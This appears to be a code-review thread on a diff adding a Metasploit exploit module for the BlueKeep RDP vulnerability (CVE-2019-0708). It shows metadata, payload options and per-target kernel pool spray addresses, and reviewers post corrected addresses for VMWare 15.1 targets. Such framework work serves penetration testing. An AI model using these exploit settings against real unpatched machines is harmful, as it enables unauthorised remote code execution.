modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

```diff
@@ -0,0 +1,1122 @@
+        allowing a malformed Disconnect Provider Indication message to cause use-after-free.
+        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
+        the freed channel is used to achieve arbitrary code execution.
+      ),
+      'Author' =>
+      [
+        'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0 - Original exploit
+        'Ryan Hanson',                              # @ryHanson - Original exploit
+        'OJ Reeves <oj@beyondbinary.io>',           # @TheColonial - Metasploit module
+        'Brent Cook <bcook@rapid7.com>',            # @busterbcook - Assembly whisperer
+      ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2019-0708'],
+          ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => 5,
+          'RDP_CLIENT_NAME' => 'ethdev',
+          'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
+        },
+      'Privileged' => true,
+      'Payload' =>
+        {
+          'Space' => CHUNK_SIZE - HEADER_SIZE,
+          'EncoderType' => Msf::Encoder::Type::Raw,
+        },
+      'Platform' => 'win',
+      'Targets' =>
+        [
+          [
+            'Automatic targeting via fingerprinting',
+            {
+              'Arch' => [ARCH_X64],
+              'FingerprintOnly' => true
+            },
+          ],
+          #
+          #
+          # Windows 2008 R2 requires the following registry change from default:
+          #
+          # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
+          # "fDisableCam"=dword:00000000
+          #
+          [
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8003800000,
+              'GROOMSIZE' => 100
+            }
+          ],
+          [
+            # This works with Virtualbox 6
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8002407000
+            }
+          ],
+          [
+            # This address works on VMWare 14
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8030c00000
+            }
+          ],
+          [
+            # This address works on VMWare 15
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8018C00000
+            }
+          ],
+          [
```

Comment:
i test windows 2008 R2 64 bit on VMWare 15.1.0
GROOMBASE should be 0xfffffa8018c08000   
This Maybe helpful to u,thanks.

Reply:
the vm created with default settings.

Reply:
the vm was created with default settings.

Reply:
alright, thanks @chummyhe89

Reply:
thanks for your quick response.
but,I tested win7 and win2008  on VMWare 15.1.0.
The base address of nonpool  page on vmware 15.1 with default setting is different between
win7 and win2008. win7:0xfffffa8001804000 win2008: 0xfffffa8018c08000.
so maybe we should use different targets.
-------------------------------------------------------------------------------
    [
            'Windows 2008 R2 (6.1.7601 x64 - VMWare 15.1)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8018c08000
            }
          ],
          [
            'Windows 7 SP1 (6.1.7601 x64 - VMWare 15.1)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8001804000
            }
          ],

Reply:
Thanks,bro